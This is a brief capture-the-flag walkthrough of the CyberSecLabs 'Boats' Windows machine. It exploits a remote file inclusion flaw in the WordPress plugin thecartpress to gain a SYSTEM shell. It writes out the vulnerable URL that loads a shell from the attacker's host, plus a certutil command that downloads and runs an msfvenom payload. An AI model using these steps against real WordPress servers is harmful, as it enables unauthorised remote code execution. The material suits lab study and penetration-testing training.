[CSL] Boats

Boats is a windows box hosted by CyberSecLabs. Let’s dive into it and start with an NMap scan.

NMap Scan

Checking HTTP we notice the website uses WordPress. Let’s kick off CMSMap to check the website and see if anything interesting is discovered.

As it can be seen below the plugin thecartpress might be vulnerable to RFI.

CMSMap Scan

To test the vuln i used Namam Sahore RFI shell. You can get it from here. Download the file and use python to create a web server.

The vulnerable parameter is: http://boats.csl/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://<YOUR_IP>/rfi_shell

The file inclusion is accomplished, therefore we can now send commands to the underlying operating system.

RFI Shell

Generate a shell using msfvenom and download using certutil. You can use the following syntax to download it: certutil -cacheurl -f http://<YOUR_IP>/shell.exe shell.exe.

Create a msf listener and run it.

MSF Listener

Get back to your RFI shell and type and execute the exe payload.

Executing the payload

The session is spawned as NT AUTHORITY\SYSTEM because the service (xampp) was running under this user.

Interacting with the session

You should now be able to grab both user&admin flag.